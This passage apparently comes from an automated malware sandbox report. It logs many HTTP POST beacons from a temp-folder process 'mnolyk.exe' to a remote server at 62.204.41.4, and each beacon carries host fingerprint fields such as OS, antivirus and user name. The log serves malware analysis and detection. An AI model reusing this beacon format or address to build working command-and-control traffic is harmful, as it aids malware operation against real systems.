                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:03.998970985 CET, kBytes transferred: 458, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 260, Source IP: 192.168.2.7, Source Port: 49987, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:08.994235992 CET, kBytes transferred: 713, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:09.058456898 CET, kBytes transferred: 713, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 261, Source IP: 192.168.2.7, Source Port: 49988, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:09.232773066 CET, kBytes transferred: 714, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:09.298605919 CET, kBytes transferred: 714, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 262, Source IP: 192.168.2.7, Source Port: 49989, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:09.476583958 CET, kBytes transferred: 715, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:09.540498972 CET, kBytes transferred: 715, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 263, Source IP: 192.168.2.7, Source Port: 49990, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:09.711791992 CET, kBytes transferred: 716, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:09.775254011 CET, kBytes transferred: 716, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 264, Source IP: 192.168.2.7, Source Port: 49991, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:09.959911108 CET, kBytes transferred: 717, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:10.023943901 CET, kBytes transferred: 717, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 265, Source IP: 192.168.2.7, Source Port: 49992, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:10.200128078 CET, kBytes transferred: 718, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:10.267174006 CET, kBytes transferred: 718, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 266, Source IP: 192.168.2.7, Source Port: 49993, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:10.446984053 CET, kBytes transferred: 719, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:10.509741068 CET, kBytes transferred: 719, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 267, Source IP: 192.168.2.7, Source Port: 49994, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:10.684632063 CET, kBytes transferred: 720, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:10.749183893 CET | 720 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      268 | 192.168.2.7 | 49995 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:11.226044893 CET | 721 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:11.294483900 CET | 721 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      269 | 192.168.2.7 | 49996 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:11.560688972 CET | 722 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:11.626969099 CET | 722 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      27 | 192.168.2.7 | 49751 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:04.175860882 CET | 459 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:04.240720034 CET | 459 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      270 | 192.168.2.7 | 49997 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:12.438412905 CET | 723 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:12.506864071 CET | 723 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      271 | 192.168.2.7 | 49998 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:12.834460020 CET | 724 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:12.898948908 CET | 724 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      272 | 192.168.2.7 | 49999 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:14.145160913 CET | 725 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.210385084 CET | 725 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      273 | 192.168.2.7 | 50000 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:14.484343052 CET | 726 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.549825907 CET | 726 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      274 | 192.168.2.7 | 50001 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:14.735616922 CET | 727 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:14.800014973 CET | 727 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      275 | 192.168.2.7 | 50002 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:14.985690117 CET | 728 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.052015066 CET | 728 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      276 | 192.168.2.7 | 50003 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:15.250782967 CET | 729 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:15.315639019 CET | 729 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
